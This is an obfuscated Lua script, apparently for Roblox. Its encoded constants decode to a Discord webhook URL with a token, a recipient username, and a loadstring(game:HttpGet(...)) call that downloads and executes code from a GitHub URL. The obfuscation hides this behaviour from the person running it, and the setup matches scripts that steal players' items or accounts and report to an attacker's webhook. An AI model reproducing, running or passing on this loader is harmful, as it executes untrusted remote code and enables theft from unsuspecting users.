--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v90=v5(v84,v19);v19=nil;return v90;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -(0 + 0) ;local v86;while true do if (v85==(0 -0)) then v86=(v31/(((880 -(282 + 595)) -1)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + 1)) ;return v86-(v86%1) ;end end else local v87=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==((118 -(32 + 85)) -0)) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(222 + 4 + 1044)) ;v34=(1 + 3) -3 ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==((3807 -2849) -(892 + 65))) then return (v38 * (436 -(67 + 113))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v36=1 + 0 ;end end end local function v23()local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(953 -(802 + 150))) then return (v43 * (45169940 -28392724)) + (v42 * 65536) + (v41 * (464 -208)) + v40 ;end if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 + 0 + 0 );v18=v18 + (1001 -(915 + 82)) ;v39=(2 -0) -1 ;end end end local function v24()local v44=v23();local v45=v23();local v46=1188 -(1069 + 118) ;local v47=(v20(v45,431 -((1957 -(1789 + 124)) + 386) ,(2272 -(745 + 21)) -(998 + 168 + 320) ) * ((4 -2)^((326 -257) -37))) + v44 ;local v48=v20(v45,4 + 17 ,1169 -(116 + (2811 -1789)) );local v49=((v20(v45,133 -101 )==(1 -0)) and  -1) or (1 + 0) ;if (v48==((0 + 0) -0)) then if (v47==(791 -(368 + 423))) then return v49 * (0 -0) ;else local v91=18 -(10 + 8) ;while true do if (((0 -0) -0)==v91) then v48=1;v46=0 + 0 ;break;end end end elseif (v48==(2489 -(416 + (89 -63)))) then return ((v47==(885 -(261 + 624))) and (v49 * (((1750 -(760 + 987)) -2)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(2446 -(630 + 793)) ) * (v46 + (v47/((3 -1)^(175 -123)))) ;end local function v25(v50)local v51=0 + 0 ;local v52;local v53;while true do if (v51==(1056 -(87 + 968))) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=8 -6 ;end if (v51==(3 + 0)) then return v6(v53);end if ((0 -0)==v51) then v52=nil;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=1414 -(447 + 966) ;end if (v51==(5 -3)) then v53={};for v92=1 + 0 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=8 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v54==2) then v59=nil;v60=nil;v54=3;end if (v54==(560 -(306 + 254))) then v55=0;v56=nil;v54=1 + 0 ;end if (3~=v54) then else v61=nil;v62=nil;v54=4;end if (4==v54) then v63=nil;while true do if (v55~=(0 -0)) then else v56=1467 -(899 + 568) ;v57=nil;v55=1 + 0 ;end if (v55~=1) then else local v100=0 -0 ;while true do if (v100~=(604 -(268 + 335))) then else v55=2;break;end if (v100==(290 -(60 + 230))) then v58=nil;v59=nil;v100=573 -(426 + 146) ;end end end if (v55==3) then v62=nil;v63=nil;v55=4;end if (v55==(1 + 3)) then while true do if (v56~=1) then else local v102=1456 -(282 + 1174) ;while true do if (v102~=0) then else v59=nil;v60=nil;v102=1;end if ((812 -(569 + 242))~=v102) then else v56=5 -3 ;break;end end end if (v56==(0 + 0)) then v57=1024 -(706 + 318) ;v58=nil;v56=1;end if (v56==(1254 -(721 + 530))) then v63=nil;while true do local v103=1271 -(945 + 326) ;while true do if (v103~=(2 -1)) then else if ((3 + 0)~=v57) then else local v121=700 -(271 + 429) ;local v122;while true do if (v121==0) then v122=0;while true do if (v122==(0 + 0)) then for v162=1501 -(1408 + 92) ,v23() do v59[v162-(1087 -(461 + 625)) ]=v28();end return v61;end end break;end end end if (v57~=1) then else local v123=1288 -(993 + 295) ;local v124;while true do if (v123~=(0 + 0)) then else v124=1171 -(418 + 753) ;while true do if (v124==(1 + 0)) then v63={};v57=2;break;end if (0==v124) then local v160=0 + 0 ;while true do if (v160==1) then v124=1;break;end if ((0 + 0)==v160) then v61={v58,v59,nil,v60};v62=v23();v160=1;end end end end break;end end end break;end if (v103==(0 + 0)) then local v104=0;while true do if (v104~=(529 -(406 + 123))) then else if (v57==2) then local v157=0;while true do if (v157==0) then for v164=1770 -(1749 + 20) ,v62 do local v165=0;local v166;local v167;while true do if (v165==0) then local v173=0 + 0 ;local v174;while true do if (0~=v173) then else v174=0;while true do if (v174==(1323 -(1249 + 73))) then v165=1 + 0 ;break;end if (v174~=0) then else v166=v21();v167=nil;v174=1;end end break;end end end if (v165==1) then if (v166==(1146 -(466 + 679))) then v167=v21()~=(0 -0) ;elseif (v166==2) then v167=v24();elseif (v166==3) then v167=v25();end v63[v164]=v167;break;end end end v61[8 -5 ]=v21();v157=1;end if (v157==1) then for v168=1901 -(106 + 1794) ,v23() do local v169=0;local v170;local v171;while true do if (0==v169) then v170=0;v171=nil;v169=1 + 0 ;end if (v169==(1 + 0)) then while true do if (v170==(0 -0)) then v171=v21();if (v20(v171,1,2 -1 )~=(114 -(4 + 110))) then else local v177=584 -(57 + 527) ;local v178;local v179;local v180;local v181;while true do if (v177==(1427 -(41 + 1386))) then local v182=0;while true do if ((103 -(17 + 86))==v182) then v178=0;v179=nil;v182=1;end if (v182~=1) then else v177=1;break;end end end if (v177==2) then while true do if (v178~=(2 + 0)) then else if (v20(v180,1,1)==1) then v181[3 -1 ]=v63[v181[2]];end if (v20(v180,5 -3 ,168 -(122 + 44) )==1) then v181[5 -2 ]=v63[v181[3]];end v178=9 -6 ;end if (3~=v178) then else if (v20(v180,3,3)~=1) then else v181[4]=v63[v181[4]];end v58[v168]=v181;break;end if (v178==(1 + 0)) then local v185=0;while true do if (v185~=1) then else v178=1 + 1 ;break;end if (v185~=(0 -0)) then else v181={v22(),v22(),nil,nil};if (v179==0) then local v193=0 -0 ;local v194;while true do if (v193~=(1212 -(323 + 889))) then else v194=0 -0 ;while true do if (v194==(580 -(361 + 219))) then v181[3]=v22();v181[4]=v22();break;end end break;end end elseif (v179==(321 -(53 + 267))) then v181[3]=v23();elseif (v179==2) then v181[1 + 2 ]=v23() -(2^16) ;elseif (v179~=(416 -(15 + 398))) then else local v199=982 -(18 + 964) ;local v200;local v201;while true do if (v199==(0 -0)) then v200=0 + 0 ;v201=nil;v199=1 + 0 ;end if (v199==(851 -(20 + 830))) then while true do if (v200~=0) then else v201=0 + 0 ;while true do if (v201==(126 -(116 + 10))) then v181[3]=v23() -((1 + 1)^(754 -(542 + 196))) ;v181[8 -4 ]=v22();break;end end break;end end break;end end end v185=1;end end end if (v178==(0 + 0)) then local v186=0 + 0 ;while true do if (v186~=(1 + 0)) then else v178=2 -1 ;break;end if (0~=v186) then else v179=v20(v171,2,3);v180=v20(v171,9 -5 ,1557 -(1126 + 425) );v186=406 -(118 + 287) ;end end end end break;end if (v177~=1) then else local v183=0 -0 ;while true do if (v183==0) then v180=nil;v181=nil;v183=1;end if (v183==(1122 -(118 + 1003))) then v177=2;break;end end end end end break;end end break;end end end v57=8 -5 ;break;end end end if (v57==(377 -(142 + 235))) then local v158=0 -0 ;local v159;while true do if (0~=v158) then else v159=0 + 0 ;while true do if (v159~=(978 -(553 + 424))) then else v60={};v57=1;break;end if (v159==0) then local v172=0;while true do if (v172==1) then v159=1;break;end if (v172~=(0 -0)) then else local v176=0 + 0 ;while true do if (v176==(1 + 0)) then v172=1 + 0 ;break;end if (v176==0) then v58={};v59={};v176=1;end end end end end end break;end end end v104=1 + 0 ;end if (v104==1) then v103=1;break;end end end end end break;end if ((2 + 0)~=v56) then else v61=nil;v62=nil;v56=6 -3 ;end end break;end if (v55==(5 -3)) then local v101=0 -0 ;while true do if (v101==0) then v60=nil;v61=nil;v101=1 + 0 ;end if (v101==(4 -3)) then v55=3;break;end end end end break;end if (v54~=(754 -(239 + 514))) then else v57=nil;v58=nil;v54=2;end end end local function v29(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==0) then v82=v70[v74];v83=v82[1];v89=1;end if (v89==1) then if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v82[3]~=0 ;else v80[v82[2]]=v82[3];end elseif (v83<=2) then v80[v82[2]]=v82[3]~=0 ;elseif (v83==3) then v80[v82[2]][v82[3]]=v82[4];else v80[v82[2]]();end elseif (v83<=7) then if (v83<=5) then v80[v82[2]]=v66[v82[3]];elseif (v83>6) then v80[v82[2]]();else local v127=v82[2];local v128=v80[v82[3]];v80[v127 + 1 ]=v128;v80[v127]=v128[v82[4]];end elseif (v83<=8) then v80[v82[2]][v82[3]]=v82[4];elseif (v83>9) then local v132=v82[2];local v133,v134=v73(v80[v132](v13(v80,v132 + 1 ,v82[3])));v75=(v134 + v132) -1 ;local v135=0;for v148=v132,v75 do v135=v135 + 1 ;v80[v148]=v133[v135];end else v74=v82[3];end elseif (v83<=15) then if (v83<=12) then if (v83==11) then v74=v82[3];else local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==2) then for v152=v115,v75 do v118=v118 + 1 ;v80[v152]=v116[v118];end break;end if (v114==0) then v115=v82[2];v116,v117=v73(v80[v115](v13(v80,v115 + 1 ,v82[3])));v114=1;end if (v114==1) then v75=(v117 + v115) -1 ;v118=0;v114=2;end end end elseif (v83<=13) then do return;end elseif (v83>14) then local v137=v82[2];v80[v137]=v80[v137](v13(v80,v137 + 1 ,v75));else local v139=v82[2];local v140=v80[v82[3]];v80[v139 + 1 ]=v140;v80[v139]=v140[v82[4]];end elseif (v83<=18) then if (v83<=16) then do return;end elseif (v83==17) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=19) then v80[v82[2]]=v82[3];elseif (v83>20) then local v144=v82[2];v80[v144]=v80[v144](v13(v80,v144 + 1 ,v75));else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3134353234363237352O313831363239342F387130333541584551564A4C7137646E51434A7A323537503342676E3039364E624B7655474C4B5359506F415332483645654D5439305871696745506D63354768477A4B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D65030F3O007261756C5F62617A2O6F6B6131393103093O00557365724E616D653200173O0012133O00013O0026113O000E000100020004093O000E0001001205000100033O003003000100040005001205000100063O001205000200073O00200E000200020008001213000400094O0001000500014O000C000200054O001500013O00022O00070001000100010004093O001600010026113O0001000100010004093O00010001001205000100033O0030030001000A000B001205000100033O0030030001000C000B0012133O00023O0004093O000100012O00103O00017O00",v9(),...);end
